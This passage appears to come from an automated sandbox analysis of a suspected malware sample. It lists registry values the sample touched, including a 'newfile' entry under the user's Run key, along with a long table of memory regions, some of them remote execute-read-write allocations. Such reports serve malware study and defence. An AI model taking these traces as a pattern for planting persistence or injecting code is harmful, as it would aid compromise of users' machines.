HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
newfile
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 30 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2084E000
|
trusted library allocation
|
page read and write
|
||
95CD000
|
direct allocation
|
page execute and read and write
|
||
20821000
|
trusted library allocation
|
page read and write
|
||
3FED000
|
remote allocation
|
page execute and read and write
|
||
8C10000
|
direct allocation
|
page execute and read and write
|
||
568E000
|
trusted library allocation
|
page read and write
|
||
603F000
|
trusted library allocation
|
page read and write
|
||
20871000
|
trusted library allocation
|
page read and write
|
||
4E60000
|
direct allocation
|
page read and write
|
||
7A67000
|
trusted library allocation
|
page read and write
|
||
22E52000
|
trusted library allocation
|
page read and write
|
||
695D000
|
stack
|
page read and write
|
||
33E0000
|
heap
|
page read and write
|
||
7150000
|
trusted library allocation
|
page read and write
|
||
2A7E000
|
heap
|
page read and write
|
||
4CFD000
|
heap
|
page read and write
|
||
2297A000
|
heap
|
page read and write
|
||
229A3000
|
heap
|
page read and write
|
||
4C70000
|
heap
|
page read and write
|
||
7FCF1000
|
trusted library allocation
|
page execute read
|
||
22E80000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
3330000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
7EEB0000
|
trusted library allocation
|
page execute and read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
32F0000
|
trusted library allocation
|
page read and write
|
||
772E000
|
stack
|
page read and write
|
||
8007000
|
heap
|
page read and write
|
||
809C000
|
stack
|
page read and write
|
||
227F0000
|
trusted library allocation
|
page read and write
|
||
29D0000
|
trusted library allocation
|
page read and write
|
||
2A9A000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
7100000
|
trusted library allocation
|
page read and write
|
||
229E2000
|
heap
|
page read and write
|
||
21BDE040000
|
trusted library allocation
|
page read and write
|
||
6E8C000
|
heap
|
page read and write
|
||
4E80000
|
direct allocation
|
page read and write
|
||
545C000
|
stack
|
page read and write
|
||
34A0000
|
heap
|
page execute and read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
7FF7000
|
heap
|
page read and write
|
||
6F50000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
2216E1E0000
|
heap
|
page read and write
|
||
21BDE0E0000
|
trusted library allocation
|
page read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
23760000
|
trusted library allocation
|
page read and write
|
||
2A74000
|
heap
|
page read and write
|
||
5D4E000
|
heap
|
page read and write
|
||
22941000
|
heap
|
page read and write
|
||
5D56000
|
heap
|
page read and write
|
||
4EE0000
|
direct allocation
|
page read and write
|
||
5D5B000
|
heap
|
page read and write
|
||
7FF6000
|
heap
|
page read and write
|
||
6FB0000
|
trusted library allocation
|
page read and write
|
||
20879000
|
trusted library allocation
|
page read and write
|
||
7D30000
|
trusted library allocation
|
page execute and read and write
|
||
8007000
|
heap
|
page read and write
|
||
A85000
|
heap
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
7FC4000
|
heap
|
page read and write
|
||
87B0000
|
heap
|
page read and write
|
||
2A98000
|
heap
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
4CCE000
|
stack
|
page read and write
|
||
2986000
|
heap
|
page read and write
|
||
22EA0000
|
trusted library allocation
|
page read and write
|
||
7A0000
|
trusted library allocation
|
page read and write
|
||
229A3000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
2A88000
|
heap
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
808F000
|
heap
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
5B14000
|
trusted library allocation
|
page read and write
|
||
2910000
|
trusted library allocation
|
page read and write
|
||
22E80000
|
trusted library allocation
|
page read and write
|
||
2350E000
|
stack
|
page read and write
|
||
327E000
|
stack
|
page read and write
|
||
22B20000
|
trusted library allocation
|
page read and write
|
||
89F0000
|
heap
|
page read and write
|
||
4CB7000
|
heap
|
page read and write
|
||
5D5B000
|
heap
|
page read and write
|
||
2940000
|
heap
|
page read and write
|
||
6F20000
|
trusted library allocation
|
page read and write
|
||
7130000
|
trusted library allocation
|
page read and write
|
||
22E28000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
7B4000
|
trusted library allocation
|
page read and write
|
||
2AB2000
|
heap
|
page read and write
|
||
797B000
|
heap
|
page read and write
|
||
29C2000
|
trusted library allocation
|
page read and write
|
||
29B3000
|
heap
|
page read and write
|
||
2950000
|
heap
|
page read and write
|
||
2A11000
|
heap
|
page read and write
|
||
2A9F000
|
heap
|
page read and write
|
||
28EF000
|
stack
|
page read and write
|
||
5D32000
|
heap
|
page read and write
|
||
490A000
|
trusted library allocation
|
page read and write
|
||
47F1000
|
trusted library allocation
|
page read and write
|
||
4D08000
|
heap
|
page read and write
|
||
C31000
|
unkown
|
page execute read
|
||
C35000
|
unkown
|
page readonly
|
||
7C90000
|
trusted library allocation
|
page read and write
|
||
871D000
|
stack
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page read and write
|
||
21BDE2BE000
|
heap
|
page read and write
|
||
21BD8C00000
|
heap
|
page read and write
|
||
2A9F000
|
heap
|
page read and write
|
||
29B0000
|
trusted library allocation
|
page read and write
|
||
2EFD000
|
stack
|
page read and write
|
||
21BDF000000
|
heap
|
page read and write
|
||
74AE000
|
stack
|
page read and write
|
||
3530000
|
trusted library allocation
|
page execute and read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
21BDE080000
|
trusted library allocation
|
page read and write
|
||
22E3D000
|
trusted library allocation
|
page read and write
|
||
7FB0000
|
trusted library allocation
|
page read and write
|
||
8E76A7E000
|
unkown
|
page readonly
|
||
4EC0000
|
direct allocation
|
page read and write
|
||
2B80000
|
heap
|
page read and write
|
||
7E0000
|
trusted library allocation
|
page read and write
|
||
7F5D000
|
stack
|
page read and write
|
||
5509000
|
trusted library allocation
|
page read and write
|
||
29C0000
|
trusted library allocation
|
page read and write
|
||
4E90000
|
direct allocation
|
page read and write
|
||
7FF6000
|
heap
|
page read and write
|
||
86B0000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
22E90000
|
trusted library allocation
|
page read and write
|
||
21BD8B30000
|
heap
|
page read and write
|
||
22EC7000
|
trusted library allocation
|
page read and write
|
||
8C7E000
|
stack
|
page read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
4B95000
|
heap
|
page read and write
|
||
2940000
|
heap
|
page read and write
|
||
2910000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
229D6000
|
heap
|
page read and write
|
||
2A98000
|
heap
|
page read and write
|
||
7FFC000
|
heap
|
page read and write
|
||
20678000
|
trusted library allocation
|
page read and write
|
||
29D7000
|
trusted library allocation
|
page execute and read and write
|
||
22E70000
|
trusted library allocation
|
page read and write
|
||
22E30000
|
trusted library allocation
|
page read and write
|
||
8015000
|
heap
|
page read and write
|
||
6E93000
|
heap
|
page read and write
|
||
A80000
|
heap
|
page read and write
|
||
502E000
|
stack
|
page read and write
|
||
2AA3000
|
heap
|
page read and write
|
||
6EE8000
|
heap
|
page read and write
|
||
5D47000
|
heap
|
page read and write
|
||
21BD8CAE000
|
heap
|
page read and write
|
||
3320000
|
trusted library allocation
|
page read and write
|
||
21BDE260000
|
heap
|
page read and write
|
||
4D0E000
|
stack
|
page read and write
|
||
2079B000
|
trusted library allocation
|
page read and write
|
||
689B000
|
stack
|
page read and write
|
||
795C000
|
heap
|
page read and write
|
||
8060000
|
heap
|
page read and write
|
||
8891000
|
heap
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
6E29AFE000
|
stack
|
page read and write
|
||
4CC7000
|
trusted library allocation
|
page read and write
|
||
2AEF000
|
heap
|
page read and write
|
||
7FDA000
|
heap
|
page read and write
|
||
7A40000
|
trusted library allocation
|
page read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
701E000
|
stack
|
page read and write
|
||
4EF1000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
7CA0000
|
trusted library allocation
|
page read and write
|
||
8760000
|
heap
|
page read and write
|
||
204FF000
|
stack
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
20854000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
2DED000
|
stack
|
page read and write
|
||
21BD8CFE000
|
heap
|
page read and write
|
||
2A93000
|
heap
|
page read and write
|
||
3078000
|
heap
|
page read and write
|
||
3465000
|
heap
|
page read and write
|
||
205D0000
|
heap
|
page read and write
|
||
4D0C000
|
heap
|
page read and write
|
||
3070000
|
heap
|
page read and write
|
||
7A70000
|
trusted library allocation
|
page read and write
|
||
4541000
|
trusted library allocation
|
page read and write
|
||
4DAE000
|
stack
|
page read and write
|
||
3309000
|
heap
|
page read and write
|
||
33AF000
|
stack
|
page read and write
|
||
2A72000
|
heap
|
page read and write
|
||
3360000
|
trusted library allocation
|
page read and write
|
||
21BD9500000
|
heap
|
page read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
2B40000
|
heap
|
page execute and read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
5D20000
|
heap
|
page read and write
|
||
21BD8C9C000
|
heap
|
page read and write
|
||
8E7647E000
|
unkown
|
page readonly
|
||
21BDE010000
|
trusted library allocation
|
page read and write
|
||
2A2C000
|
heap
|
page read and write
|
||
897D000
|
stack
|
page read and write
|
||
29E0000
|
heap
|
page read and write
|
||
800B000
|
heap
|
page read and write
|
||
8015000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
2036F000
|
stack
|
page read and write
|
||
21BDE2D3000
|
heap
|
page read and write
|
||
7320000
|
heap
|
page execute and read and write
|
||
21BD8CA2000
|
heap
|
page read and write
|
||
8E769FE000
|
stack
|
page read and write
|
||
21BD8D13000
|
heap
|
page read and write
|
||
20796000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
68DE000
|
stack
|
page read and write
|
||
808D000
|
heap
|
page read and write
|
||
705F000
|
stack
|
page read and write
|
||
6A2B000
|
stack
|
page read and write
|
||
5D10000
|
heap
|
page read and write
|
||
7BD0000
|
trusted library allocation
|
page execute and read and write
|
||
C4D000
|
unkown
|
page readonly
|
||
5D56000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
6D32000
|
heap
|
page read and write
|
||
8E753FE000
|
stack
|
page read and write
|
||
8760000
|
heap
|
page read and write
|
||
6BA0000
|
heap
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
21BD8A30000
|
heap
|
page read and write
|
||
22EC0000
|
trusted library allocation
|
page read and write
|
||
6F47000
|
trusted library allocation
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
5EB9000
|
trusted library allocation
|
page read and write
|
||
21BD93C1000
|
trusted library allocation
|
page read and write
|
||
43AE000
|
stack
|
page read and write
|
||
4916000
|
trusted library allocation
|
page read and write
|
||
202BF000
|
stack
|
page read and write
|
||
3230000
|
heap
|
page read and write
|
||
22E30000
|
trusted library allocation
|
page read and write
|
||
5B40000
|
heap
|
page read and write
|
||
8015000
|
heap
|
page read and write
|
||
2041E000
|
stack
|
page read and write
|
||
8D70000
|
direct allocation
|
page read and write
|
||
9FCD000
|
direct allocation
|
page execute and read and write
|
||
22840000
|
heap
|
page execute and read and write
|
||
6F18000
|
heap
|
page read and write
|
||
21BDE150000
|
trusted library allocation
|
page read and write
|
||
88C5000
|
heap
|
page read and write
|
||
29D0000
|
heap
|
page read and write
|
||
21BDE288000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
5D4B000
|
heap
|
page read and write
|
||
2A4D000
|
heap
|
page read and write
|
||
8E75B7E000
|
unkown
|
page readonly
|
||
463D000
|
trusted library allocation
|
page read and write
|
||
21BD9400000
|
heap
|
page read and write
|
||
2BE6000
|
heap
|
page read and write
|
||
2A9F000
|
heap
|
page read and write
|
||
7E5000
|
trusted library allocation
|
page execute and read and write
|
||
311F000
|
unkown
|
page read and write
|
||
29D2000
|
trusted library allocation
|
page read and write
|
||
33E0000
|
heap
|
page read and write
|
||
23770000
|
trusted library allocation
|
page read and write
|
||
2A7C000
|
stack
|
page read and write
|
||
8A3B000
|
heap
|
page read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
2A8D000
|
heap
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
5D56000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
8007000
|
heap
|
page read and write
|
||
8E743EB000
|
stack
|
page read and write
|
||
2A11000
|
heap
|
page read and write
|
||
4830000
|
trusted library allocation
|
page read and write
|
||
331D000
|
trusted library allocation
|
page execute and read and write
|
||
4CC4000
|
heap
|
page read and write
|
||
4D8E000
|
stack
|
page read and write
|
||
74EB000
|
stack
|
page read and write
|
||
7DA000
|
trusted library allocation
|
page execute and read and write
|
||
746A000
|
stack
|
page read and write
|
||
7120000
|
trusted library allocation
|
page read and write
|
||
8E7607E000
|
unkown
|
page readonly
|
||
6E98000
|
heap
|
page read and write
|
||
2079E000
|
trusted library allocation
|
page read and write
|
||
80DE000
|
stack
|
page read and write
|
||
776E000
|
stack
|
page read and write
|
||
4DF0000
|
trusted library allocation
|
page read and write
|
||
81FF000
|
stack
|
page read and write
|
||
7C60000
|
trusted library allocation
|
page read and write
|
||
23780000
|
trusted library allocation
|
page read and write
|
||
2074C000
|
stack
|
page read and write
|
||
31AE000
|
stack
|
page read and write
|
||
340C000
|
heap
|
page read and write
|
||
4AB3000
|
trusted library allocation
|
page read and write
|
||
21BD8D02000
|
heap
|
page read and write
|
||
8140000
|
heap
|
page read and write
|
||
6FD0000
|
trusted library allocation
|
page read and write
|
||
22B20000
|
heap
|
page read and write
|
||
7B90000
|
heap
|
page read and write
|
||
28FF000
|
stack
|
page read and write
|
||
3340000
|
trusted library allocation
|
page read and write
|
||
22E3D000
|
trusted library allocation
|
page read and write
|
||
2AB2000
|
heap
|
page read and write
|
||
22B20000
|
trusted library allocation
|
page read and write
|
||
77EE000
|
stack
|
page read and write
|
||
685D000
|
stack
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
5484000
|
trusted library allocation
|
page read and write
|
||
23550000
|
trusted library allocation
|
page read and write
|
||
2A44000
|
heap
|
page read and write
|
||
2AB3000
|
heap
|
page read and write
|
||
29A3000
|
trusted library allocation
|
page execute and read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
4CAD000
|
heap
|
page read and write
|
||
7325000
|
heap
|
page execute and read and write
|
||
7FC3000
|
heap
|
page read and write
|
||
4C57000
|
heap
|
page read and write
|
||
C35000
|
unkown
|
page readonly
|
||
2A93000
|
heap
|
page read and write
|
||
5D4E000
|
heap
|
page read and write
|
||
5D5E000
|
heap
|
page read and write
|
||
2A74000
|
heap
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
89BC000
|
stack
|
page read and write
|
||
8BD0000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
5482000
|
trusted library allocation
|
page read and write
|
||
7BC0000
|
trusted library allocation
|
page read and write
|
||
57CC000
|
stack
|
page read and write
|
||
7180000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
8E74D7B000
|
stack
|
page read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
4DCF000
|
stack
|
page read and write
|
||
21BD9402000
|
heap
|
page read and write
|
||
21BD8C90000
|
heap
|
page read and write
|
||
699A000
|
stack
|
page read and write
|
||
8015000
|
heap
|
page read and write
|
||
70DD000
|
stack
|
page read and write
|
||
33DE000
|
stack
|
page read and write
|
||
2AB6000
|
heap
|
page read and write
|
||
21BD8C13000
|
heap
|
page read and write
|
||
21BD8B60000
|
trusted library allocation
|
page read and write
|
||
21BD8C76000
|
heap
|
page read and write
|
||
8E7507E000
|
unkown
|
page readonly
|
||
2DA0000
|
heap
|
page read and write
|
||
202E0000
|
trusted library allocation
|
page read and write
|
||
4D00000
|
heap
|
page read and write
|
||
8860000
|
heap
|
page read and write
|
||
7C70000
|
trusted library allocation
|
page read and write
|
||
2A24000
|
heap
|
page read and write
|
||
6EA2000
|
heap
|
page read and write
|
||
4970000
|
heap
|
page read and write
|
||
7CF0000
|
trusted library allocation
|
page read and write
|
||
2DA5000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
53DF000
|
stack
|
page read and write
|
||
54E1000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
481C000
|
trusted library allocation
|
page read and write
|
||
2A98000
|
heap
|
page read and write
|
||
C30000
|
unkown
|
page readonly
|
||
4AB1000
|
trusted library allocation
|
page read and write
|
||
7110000
|
trusted library allocation
|
page read and write
|
||
3300000
|
heap
|
page read and write
|
||
2295F000
|
heap
|
page read and write
|
||
73F000
|
stack
|
page read and write
|
||
801E000
|
stack
|
page read and write
|
||
88FF000
|
heap
|
page read and write
|
||
22E30000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
7CEB000
|
stack
|
page read and write
|
||
20510000
|
direct allocation
|
page read and write
|
||
3342000
|
trusted library allocation
|
page read and write
|
||
80B7000
|
heap
|
page read and write
|
||
207AE000
|
trusted library allocation
|
page read and write
|
||
2DE0000
|
heap
|
page read and write
|
||
4CB3000
|
trusted library allocation
|
page read and write
|
||
7B3000
|
trusted library allocation
|
page execute and read and write
|
||
22E1E000
|
stack
|
page read and write
|
||
4EB0000
|
direct allocation
|
page read and write
|
||
21BDE011000
|
trusted library allocation
|
page read and write
|
||
22D9E000
|
stack
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
88A9000
|
heap
|
page read and write
|
||
2A2F000
|
heap
|
page read and write
|
||
5D56000
|
heap
|
page read and write
|
||
5D5B000
|
heap
|
page read and write
|
||
3E80000
|
remote allocation
|
page execute and read and write
|
||
C37000
|
unkown
|
page readonly
|
||
3447000
|
heap
|
page read and write
|
||
4946000
|
trusted library allocation
|
page read and write
|
||
4BD000
|
stack
|
page read and write
|
||
21BD8C6F000
|
heap
|
page read and write
|
||
736B000
|
stack
|
page read and write
|
||
573F000
|
stack
|
page read and write
|
||
8120000
|
heap
|
page read and write
|
||
5D64000
|
heap
|
page read and write
|
||
2978000
|
heap
|
page read and write
|
||
2AA4000
|
heap
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
8E75D7E000
|
unkown
|
page readonly
|
||
21BDE302000
|
heap
|
page read and write
|
||
23550000
|
trusted library allocation
|
page read and write
|
||
2A72000
|
heap
|
page read and write
|
||
23550000
|
trusted library allocation
|
page read and write
|
||
555000
|
heap
|
page read and write
|
||
8891000
|
heap
|
page read and write
|
||
2A83000
|
heap
|
page read and write
|
||
29A4000
|
trusted library allocation
|
page read and write
|
||
22E20000
|
trusted library allocation
|
page read and write
|
||
31AD000
|
stack
|
page read and write
|
||
4ED0000
|
direct allocation
|
page read and write
|
||
808A000
|
heap
|
page read and write
|
||
2BFE000
|
unkown
|
page read and write
|
||
2A98000
|
heap
|
page read and write
|
||
207F1000
|
trusted library allocation
|
page read and write
|
||
76E000
|
stack
|
page read and write
|
||
8065000
|
heap
|
page read and write
|
||
8091000
|
heap
|
page read and write
|
||
4B90000
|
heap
|
page read and write
|
||
8E7527E000
|
unkown
|
page readonly
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
2056A000
|
stack
|
page read and write
|
||
207D0000
|
trusted library allocation
|
page read and write
|
||
2084C000
|
trusted library allocation
|
page read and write
|
||
229D4000
|
heap
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
7F9E000
|
stack
|
page read and write
|
||
23560000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
7E2000
|
trusted library allocation
|
page read and write
|
||
4B7000
|
stack
|
page read and write
|
||
4D14000
|
heap
|
page read and write
|
||
87D0000
|
trusted library allocation
|
page read and write
|
||
8000000
|
heap
|
page read and write
|
||
6E29B7E000
|
stack
|
page read and write
|
||
8147000
|
heap
|
page read and write
|
||
237A0000
|
trusted library allocation
|
page execute and read and write
|
||
2A7F000
|
heap
|
page read and write
|
||
2A8F000
|
heap
|
page read and write
|
||
21BD9415000
|
heap
|
page read and write
|
||
6E8F000
|
heap
|
page read and write
|
||
7FCF000
|
heap
|
page read and write
|
||
BDE000
|
stack
|
page read and write
|
||
C31000
|
unkown
|
page execute read
|
||
2A6E000
|
heap
|
page read and write
|
||
2D7E000
|
stack
|
page read and write
|
||
22DDE000
|
stack
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
4E4E000
|
stack
|
page read and write
|
||
8E7637B000
|
stack
|
page read and write
|
||
731D000
|
stack
|
page read and write
|
||
8091000
|
heap
|
page read and write
|
||
4F10000
|
direct allocation
|
page read and write
|
||
2A91000
|
heap
|
page read and write
|
||
8E76179000
|
stack
|
page read and write
|
||
2A8D000
|
heap
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
8C30000
|
trusted library allocation
|
page execute and read and write
|
||
80B4000
|
heap
|
page read and write
|
||
8D10000
|
direct allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
2283C000
|
stack
|
page read and write
|
||
31B0000
|
heap
|
page read and write
|
||
5D4E000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
2A93000
|
heap
|
page read and write
|
||
21BD951A000
|
heap
|
page read and write
|
||
8E754FE000
|
stack
|
page read and write
|
||
2E26000
|
heap
|
page read and write
|
||
7FC5000
|
heap
|
page read and write
|
||
7FE0000
|
heap
|
page read and write
|
||
22E30000
|
trusted library allocation
|
page read and write
|
||
21BDE160000
|
trusted library allocation
|
page read and write
|
||
21BDE22C000
|
heap
|
page read and write
|
||
8D20000
|
direct allocation
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
29E0000
|
trusted library allocation
|
page execute and read and write
|
||
8065000
|
heap
|
page read and write
|
||
2A6E000
|
heap
|
page read and write
|
||
808D000
|
heap
|
page read and write
|
||
21BDE054000
|
trusted library allocation
|
page read and write
|
||
3488000
|
trusted library allocation
|
page read and write
|
||
539E000
|
stack
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
4CC4000
|
heap
|
page read and write
|
||
811C000
|
stack
|
page read and write
|
||
2216FCB0000
|
heap
|
page read and write
|
||
4EF0000
|
direct allocation
|
page read and write
|
||
22E30000
|
trusted library allocation
|
page read and write
|
||
294D000
|
heap
|
page read and write
|
||
709E000
|
stack
|
page read and write
|
||
808D000
|
heap
|
page read and write
|
||
21BDE1B0000
|
remote allocation
|
page read and write
|
||
79F0000
|
heap
|
page read and write
|
||
7BF0000
|
heap
|
page read and write
|
||
8015000
|
heap
|
page read and write
|
||
23760000
|
trusted library allocation
|
page read and write
|
||
49ED000
|
remote allocation
|
page execute and read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
B5B000
|
stack
|
page read and write
|
||
22965000
|
heap
|
page read and write
|
||
7B3E000
|
stack
|
page read and write
|
||
5D47000
|
heap
|
page read and write
|
||
8CE0000
|
direct allocation
|
page read and write
|
||
541B000
|
stack
|
page read and write
|
||
2AC8000
|
heap
|
page read and write
|
||
446E000
|
stack
|
page read and write
|
||
205C0000
|
trusted library allocation
|
page read and write
|
||
442E000
|
stack
|
page read and write
|
||
769000
|
heap
|
page read and write
|
||
6F1A000
|
heap
|
page read and write
|
||
554A000
|
trusted library allocation
|
page read and write
|
||
21BDE2E4000
|
heap
|
page read and write
|
||
2A7F000
|
heap
|
page read and write
|
||
21BDE2CB000
|
heap
|
page read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
3010000
|
heap
|
page read and write
|
||
5D5C000
|
heap
|
page read and write
|
||
7190000
|
trusted library allocation
|
page read and write
|
||
29F6000
|
heap
|
page read and write
|
||
7940000
|
heap
|
page read and write
|
||
2A44000
|
heap
|
page read and write
|
||
7570000
|
heap
|
page read and write
|
||
8E752FE000
|
stack
|
page read and write
|
||
7FF6000
|
heap
|
page read and write
|
||
5D5E000
|
heap
|
page read and write
|
||
A7C2000
|
trusted library allocation
|
page read and write
|
||
8060000
|
heap
|
page read and write
|
||
20480000
|
remote allocation
|
page read and write
|
||
229A3000
|
heap
|
page read and write
|
||
2A9F000
|
heap
|
page read and write
|
||
8055000
|
heap
|
page read and write
|
||
29C0000
|
heap
|
page read and write
|
||
2A9A000
|
heap
|
page read and write
|
||
21BDE000000
|
trusted library allocation
|
page read and write
|
||
8E75F7E000
|
unkown
|
page readonly
|
||
5E91000
|
trusted library allocation
|
page read and write
|
||
8007000
|
heap
|
page read and write
|
||
22E30000
|
trusted library allocation
|
page read and write
|
||
204BE000
|
stack
|
page read and write
|
||
8D80000
|
direct allocation
|
page read and write
|
||
44E1000
|
trusted library allocation
|
page read and write
|
||
29C6000
|
trusted library allocation
|
page execute and read and write
|
||
5D62000
|
heap
|
page read and write
|
||
2AAF000
|
heap
|
page read and write
|
||
47D3000
|
heap
|
page read and write
|
||
21BD9502000
|
heap
|
page read and write
|
||
22E43000
|
trusted library allocation
|
page read and write
|
||
23550000
|
trusted library allocation
|
page read and write
|
||
21BDE2FD000
|
heap
|
page read and write
|
||
48DA000
|
stack
|
page read and write
|
||
3329000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
2216E375000
|
heap
|
page read and write
|
||
2A2F000
|
heap
|
page read and write
|
||
66E000
|
stack
|
page read and write
|
||
4803000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
22E20000
|
trusted library allocation
|
page read and write
|
||
8E75E7E000
|
stack
|
page read and write
|
||
22E47000
|
trusted library allocation
|
page read and write
|
||
71B0000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
8E759FE000
|
unkown
|
page readonly
|
||
21BD8D29000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
89FD000
|
heap
|
page read and write
|
||
4807000
|
trusted library allocation
|
page read and write
|
||
22EC0000
|
trusted library allocation
|
page read and write
|
||
2930000
|
trusted library allocation
|
page execute and read and write
|
||
207C2000
|
trusted library allocation
|
page read and write
|
||
2A91000
|
heap
|
page read and write
|
||
C1F000
|
stack
|
page read and write
|
||
7FD8000
|
heap
|
page read and write
|
||
4F7000
|
stack
|
page read and write
|
||
2084A000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
20880000
|
trusted library allocation
|
page read and write
|
||
29FE000
|
heap
|
page read and write
|
||
29D5000
|
trusted library allocation
|
page execute and read and write
|
||
2D9B000
|
heap
|
page read and write
|
||
2A4D000
|
heap
|
page read and write
|
||
89F9000
|
heap
|
page read and write
|
||
20480000
|
remote allocation
|
page read and write
|
||
724E000
|
stack
|
page read and write
|
||
71A0000
|
trusted library allocation
|
page read and write
|
||
8E74B7E000
|
stack
|
page read and write
|
||
2E2E000
|
heap
|
page read and write
|
||
79E4000
|
heap
|
